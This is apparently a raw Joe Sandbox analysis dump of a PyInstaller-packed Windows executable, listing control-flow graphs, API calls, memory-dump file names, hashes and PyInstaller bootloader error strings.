119->121 122 7ff7102c390e-7ff7102c3918 call 7ff7102c6970 119->122 121->122 135 7ff7102c3905-7ff7102c390c 121->135 132 7ff7102c3923-7ff7102c3931 call 7ff7102c6cd0 122->132 133 7ff7102c391a-7ff7102c3921 122->133 126->103 130 7ff7102c395c-7ff7102c3966 call 7ff7102c30e0 126->130 130->110 144 7ff7102c396c-7ff7102c3980 call 7ff7102c83e0 130->144 132->126 146 7ff7102c3933 132->146 137 7ff7102c393a-7ff7102c3942 call 7ff7102c2870 call 7ff7102c6780 133->137 135->137 137->118 151 7ff7102c3982-7ff7102c399f PostMessageW GetMessageW 144->151 152 7ff7102c39a5-7ff7102c39e8 call 7ff7102c7f20 call 7ff7102c7fc0 call 7ff7102c6780 call 7ff7102c6510 call 7ff7102c7ec0 144->152 146->137 151->152 163 7ff7102c39ea-7ff7102c3a00 call 7ff7102c81f0 call 7ff7102c7ec0 152->163 164 7ff7102c3a3d-7ff7102c3a4b call 7ff7102c18a0 152->164 163->164 171 7ff7102c3a02-7ff7102c3a10 163->171 164->110 172 7ff7102c3a12-7ff7102c3a2c call 7ff7102c25f0 call 7ff7102c18a0 171->172 173 7ff7102c3a31-7ff7102c3a38 call 7ff7102c2870 171->173 172->110 173->164
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                                                                                  • Opcode ID: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
                                                                                                                                                                                                  • Instruction ID: cca435bbda14adafb9fc625ea32514403f384e5e3c96569e3c00c80d3c286be6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F19021A28E8291FA19FB20D6552F9EB51AF447A0FC48431DA5D437D6EF2CF65CC360

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 245 7ff7102e4f10-7ff7102e4f4b call 7ff7102e4898 call 7ff7102e48a0 call 7ff7102e4908 252 7ff7102e5175-7ff7102e51c1 call 7ff7102d9c10 call 7ff7102e4898 call 7ff7102e48a0 call 7ff7102e4908 245->252 253 7ff7102e4f51-7ff7102e4f5c call 7ff7102e48a8 245->253 278 7ff7102e52ff-7ff7102e536d call 7ff7102d9c10 call 7ff7102e0888 252->278 279 7ff7102e51c7-7ff7102e51d2 call 7ff7102e48a8 252->279 253->252 258 7ff7102e4f62-7ff7102e4f6c 253->258 260 7ff7102e4f8e-7ff7102e4f92 258->260 261 7ff7102e4f6e-7ff7102e4f71 258->261 264 7ff7102e4f95-7ff7102e4f9d 260->264 263 7ff7102e4f74-7ff7102e4f7f 261->263 266 7ff7102e4f81-7ff7102e4f88 263->266 267 7ff7102e4f8a-7ff7102e4f8c 263->267 264->264 268 7ff7102e4f9f-7ff7102e4fb2 call 7ff7102dc90c 264->268 266->263 266->267 267->260 270 7ff7102e4fbb-7ff7102e4fc9 267->270 276 7ff7102e4fb4-7ff7102e4fb6 call 7ff7102d9c58 268->276 277 7ff7102e4fca-7ff7102e4fd6 call 7ff7102d9c58 268->277 276->270 287 7ff7102e4fdd-7ff7102e4fe5 277->287 298 7ff7102e536f-7ff7102e5376 278->298 299 7ff7102e537b-7ff7102e537e 278->299 279->278 288 7ff7102e51d8-7ff7102e51e3 call 7ff7102e48d8 279->288 287->287 290 7ff7102e4fe7-7ff7102e4ff8 call 7ff7102df784 287->290 288->278 297 7ff7102e51e9-7ff7102e520c call 7ff7102d9c58 GetTimeZoneInformation 288->297 290->252 300 7ff7102e4ffe-7ff7102e5054 call 7ff7102e97e0 * 4 call 7ff7102e4e2c 290->300 314 7ff7102e52d4-7ff7102e52fe call 7ff7102e4890 call 7ff7102e4880 call 7ff7102e4888 297->314 315 7ff7102e5212-7ff7102e5233 297->315 302 7ff7102e540b-7ff7102e540e 298->302 303 7ff7102e53b5-7ff7102e53c8 call 7ff7102dc90c 299->303 304 7ff7102e5380 299->304 358 7ff7102e5056-7ff7102e505a 300->358 307 7ff7102e5414-7ff7102e541c call 7ff7102e4f10 302->307 308 7ff7102e5383 302->308 320 7ff7102e53d3-7ff7102e53ee call 7ff7102e0888 303->320 321 7ff7102e53ca 303->321 304->308 316 7ff7102e5388-7ff7102e53b4 call 7ff7102d9c58 call 7ff7102cb870 307->316 308->316 317 7ff7102e5383 call 7ff7102e518c 308->317 322 7ff7102e5235-7ff7102e523b 315->322 323 7ff7102e523e-7ff7102e5245 315->323 317->316 344 7ff7102e53f5-7ff7102e5407 call 7ff7102d9c58 320->344 345 7ff7102e53f0-7ff7102e53f3 320->345 327 7ff7102e53cc-7ff7102e53d1 call 7ff7102d9c58 321->327 322->323 329 7ff7102e5247-7ff7102e524f 323->329 330 7ff7102e5259 323->330 327->304 329->330 338 7ff7102e5251-7ff7102e5257 329->338 335 7ff7102e525b-7ff7102e52cf call 7ff7102e97e0 * 4 call 7ff7102e1e6c call 7ff7102e5424 * 2 330->335 335->314 338->335 344->302 345->327 360 7ff7102e5060-7ff7102e5064 358->360 361 7ff7102e505c 358->361 360->358 363 7ff7102e5066-7ff7102e508b call 7ff7102d5e68 360->363 361->360 369 7ff7102e508e-7ff7102e5092 363->369 370 7ff7102e5094-7ff7102e509f 369->370 371 7ff7102e50a1-7ff7102e50a5 369->371 370->371 373 7ff7102e50a7-7ff7102e50ab 370->373 371->369 375 7ff7102e512c-7ff7102e5130 373->375 376 7ff7102e50ad-7ff7102e50d5 call 7ff7102d5e68 373->376 378 7ff7102e5132-7ff7102e5134 375->378 379 7ff7102e5137-7ff7102e5144 375->379 385 7ff7102e50f3-7ff7102e50f7 376->385 386 7ff7102e50d7 376->386 378->379 381 7ff7102e5146-7ff7102e515c call 7ff7102e4e2c 379->381 382 7ff7102e515f-7ff7102e516e call 7ff7102e4890 call 7ff7102e4880 379->382 381->382 382->252 385->375 391 7ff7102e50f9-7ff7102e5117 call 7ff7102d5e68 385->391 389 7ff7102e50da-7ff7102e50e1 386->389 389->385 392 7ff7102e50e3-7ff7102e50f1 389->392 397 7ff7102e5123-7ff7102e512a 391->397 392->385 392->389 397->375 398 7ff7102e5119-7ff7102e511d 397->398 398->375 399 7ff7102e511f 398->399 399->397
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E4F55
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48BC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7102D9BEF,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102D9C19
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7102D9BEF,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102D9C3E
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E4F44
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E491C
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51BA
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51CB
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51DC
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7102E541C), ref: 00007FF7102E5203
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                  • API String ID: 4070488512-239921721
                                                                                                                                                                                                  • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                  • Instruction ID: 2725e732b581453a11cc6762f3f697c3dfffd8e5f73bbbfce9f7a15ecc798ea8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D1B126A58A5286EB20FF21D8501B9BB91FF447A4FC4413AEA0D57B85EF3CF449C760

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 538 7ff7102e5c74-7ff7102e5ce7 call 7ff7102e59a8 541 7ff7102e5d01-7ff7102e5d0b call 7ff7102d7830 538->541 542 7ff7102e5ce9-7ff7102e5cf2 call 7ff7102d43d4 538->542 547 7ff7102e5d26-7ff7102e5d8f CreateFileW 541->547 548 7ff7102e5d0d-7ff7102e5d24 call 7ff7102d43d4 call 7ff7102d43f4 541->548 549 7ff7102e5cf5-7ff7102e5cfc call 7ff7102d43f4 542->549 551 7ff7102e5d91-7ff7102e5d97 547->551 552 7ff7102e5e0c-7ff7102e5e17 GetFileType 547->552 548->549 560 7ff7102e6042-7ff7102e6062 549->560 558 7ff7102e5dd9-7ff7102e5e07 GetLastError call 7ff7102d4368 551->558 559 7ff7102e5d99-7ff7102e5d9d 551->559 555 7ff7102e5e6a-7ff7102e5e71 552->555 556 7ff7102e5e19-7ff7102e5e54 GetLastError call 7ff7102d4368 CloseHandle 552->556 563 7ff7102e5e73-7ff7102e5e77 555->563 564 7ff7102e5e79-7ff7102e5e7c 555->564 556->549 572 7ff7102e5e5a-7ff7102e5e65 call 7ff7102d43f4 556->572 558->549 559->558 565 7ff7102e5d9f-7ff7102e5dd7 CreateFileW 559->565 569 7ff7102e5e82-7ff7102e5ed7 call 7ff7102d7748 563->569 564->569 570 7ff7102e5e7e 564->570 565->552 565->558 577 7ff7102e5ef6-7ff7102e5f27 call 7ff7102e5728 569->577 578 7ff7102e5ed9-7ff7102e5ee5 call 7ff7102e5bb0 569->578 570->569 572->549 584 7ff7102e5f2d-7ff7102e5f6f 577->584 585 7ff7102e5f29-7ff7102e5f2b 577->585 578->577 583 7ff7102e5ee7 578->583 586 7ff7102e5ee9-7ff7102e5ef1 call 7ff7102d9dd0 583->586 587 7ff7102e5f91-7ff7102e5f9c 584->587 588 7ff7102e5f71-7ff7102e5f75 584->588 585->586 586->560 591 7ff7102e6040 587->591 592 7ff7102e5fa2-7ff7102e5fa6 587->592 588->587 590 7ff7102e5f77-7ff7102e5f8c 588->590 590->587 591->560 592->591 594 7ff7102e5fac-7ff7102e5ff1 CloseHandle CreateFileW 592->594 595 7ff7102e5ff3-7ff7102e6021 GetLastError call 7ff7102d4368 call 7ff7102d7970 594->595 596 7ff7102e6026-7ff7102e603b 594->596 595->596 596->591
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                  • Instruction ID: 8aa53c75860bba3fa9c257e1e5a99d171ce34b3a74009042b355a960b361eed1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C1E433B24E5186EB10DF68C4902AD7B61FB49BA8B411235DF1E67794DF38E559C320

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 869 7ff7102e518c-7ff7102e51c1 call 7ff7102e4898 call 7ff7102e48a0 call 7ff7102e4908 876 7ff7102e52ff-7ff7102e536d call 7ff7102d9c10 call 7ff7102e0888 869->876 877 7ff7102e51c7-7ff7102e51d2 call 7ff7102e48a8 869->877 889 7ff7102e536f-7ff7102e5376 876->889 890 7ff7102e537b-7ff7102e537e 876->890 877->876 882 7ff7102e51d8-7ff7102e51e3 call 7ff7102e48d8 877->882 882->876 888 7ff7102e51e9-7ff7102e520c call 7ff7102d9c58 GetTimeZoneInformation 882->888 901 7ff7102e52d4-7ff7102e52fe call 7ff7102e4890 call 7ff7102e4880 call 7ff7102e4888 888->901 902 7ff7102e5212-7ff7102e5233 888->902 892 7ff7102e540b-7ff7102e540e 889->892 893 7ff7102e53b5-7ff7102e53c8 call 7ff7102dc90c 890->893 894 7ff7102e5380 890->894 895 7ff7102e5414-7ff7102e541c call 7ff7102e4f10 892->895 896 7ff7102e5383 892->896 906 7ff7102e53d3-7ff7102e53ee call 7ff7102e0888 893->906 907 7ff7102e53ca 893->907 894->896 903 7ff7102e5388-7ff7102e53b4 call 7ff7102d9c58 call 7ff7102cb870 895->903 896->903 904 7ff7102e5383 call 7ff7102e518c 896->904 908 7ff7102e5235-7ff7102e523b 902->908 909 7ff7102e523e-7ff7102e5245 902->909 904->903 927 7ff7102e53f5-7ff7102e5407 call 7ff7102d9c58 906->927 928 7ff7102e53f0-7ff7102e53f3 906->928 912 7ff7102e53cc-7ff7102e53d1 call 7ff7102d9c58 907->912 908->909 914 7ff7102e5247-7ff7102e524f 909->914 915 7ff7102e5259 909->915 912->894 914->915 922 7ff7102e5251-7ff7102e5257 914->922 919 7ff7102e525b-7ff7102e52cf call 7ff7102e97e0 * 4 call 7ff7102e1e6c call 7ff7102e5424 * 2 915->919 919->901 922->919 927->892 928->912
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51BA
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E491C
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51CB
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48BC
                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7102E51DC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102E48EC
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7102E541C), ref: 00007FF7102E5203
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                                                                                  • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                  • Instruction ID: ff8905ffbdd9d7818128243ef185a5b5f5ba94ed17029985c61b5d4557d103eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B518332A58A5286E710FF21D8811A9FB64FF487A4FC4413AEA4D57795DF3CF4488760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                  • Instruction ID: 685b96d5d7ad67f7eddb0fa77934927e8187ca659d535f332a28d34b347711cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0C822A28A4186F7619B60B598366B750AB44778F844335D96E127D4CF7CF05C8A14

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 179 7ff7102c18f0-7ff7102c192b call 7ff7102c3f70 182 7ff7102c1bc1-7ff7102c1be5 call 7ff7102cb870 179->182 183 7ff7102c1931-7ff7102c1971 call 7ff7102c76a0 179->183 188 7ff7102c1977-7ff7102c1987 call 7ff7102cf9f4 183->188 189 7ff7102c1bae-7ff7102c1bb1 call 7ff7102cf36c 183->189 194 7ff7102c19a1-7ff7102c19bd call 7ff7102cf6bc 188->194 195 7ff7102c1989-7ff7102c199c call 7ff7102c2760 188->195 193 7ff7102c1bb6-7ff7102c1bbe 189->193 193->182 200 7ff7102c19bf-7ff7102c19d2 call 7ff7102c2760 194->200 201 7ff7102c19d7-7ff7102c19ec call 7ff7102d4154 194->201 195->189 200->189 206 7ff7102c1a06-7ff7102c1a90 call 7ff7102c1bf0 * 2 call 7ff7102cf9f4 call 7ff7102d4170 201->206 207 7ff7102c19ee-7ff7102c1a01 call 7ff7102c2760 201->207 217 7ff7102c1a95-7ff7102c1a9f 206->217 207->189 218 7ff7102c1aa1-7ff7102c1ab4 call 7ff7102c2760 217->218 219 7ff7102c1ab9-7ff7102c1ad2 call 7ff7102cf6bc 217->219 218->189 224 7ff7102c1ad4-7ff7102c1ae7 call 7ff7102c2760 219->224 225 7ff7102c1aec-7ff7102c1b08 call 7ff7102cf430 219->225 224->189 230 7ff7102c1b0a-7ff7102c1b16 call 7ff7102c25f0 225->230 231 7ff7102c1b1b-7ff7102c1b29 225->231 230->189 231->189 232 7ff7102c1b2f-7ff7102c1b3e 231->232 234 7ff7102c1b40-7ff7102c1b46 232->234 236 7ff7102c1b60-7ff7102c1b6f 234->236 237 7ff7102c1b48-7ff7102c1b55 234->237 236->236 238 7ff7102c1b71-7ff7102c1b7a 236->238 237->238 239 7ff7102c1b8f 238->239 240 7ff7102c1b7c-7ff7102c1b7f 238->240 242 7ff7102c1b91-7ff7102c1bac 239->242 240->239 241 7ff7102c1b81-7ff7102c1b84 240->241 241->239 243 7ff7102c1b86-7ff7102c1b89 241->243 242->189 242->234 243->239 244 7ff7102c1b8b-7ff7102c1b8d 243->244 244->242
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                                                                                  • Opcode ID: d524917e89b801da10e80b3ca34b087cb2f64d4ecab2cc22987bc85bc7bfaca7
                                                                                                                                                                                                  • Instruction ID: 007d373095b30d620df114ae9d0f47ca2be00f462190123030a4d5393fba77e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d524917e89b801da10e80b3ca34b087cb2f64d4ecab2cc22987bc85bc7bfaca7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B271E571A28E8285EB21EB14D5513BAAB90FF457A4F904035E98D47799EE3CF94C8B20

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                  • Opcode ID: 2048e37e2dbcde694c6460e961e71067ec18d50eb38cb5dd6bedaf900731452f
                                                                                                                                                                                                  • Instruction ID: 1e80b0dc757a02401dcb4ba824b1a6a7c3a3cdc8484b327db10704f9629a8bf5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2048e37e2dbcde694c6460e961e71067ec18d50eb38cb5dd6bedaf900731452f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E41B022B18A4381EA21BB15AA415B6EBA0FF457E4FD44032DE4D17B95EE3CF4498720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
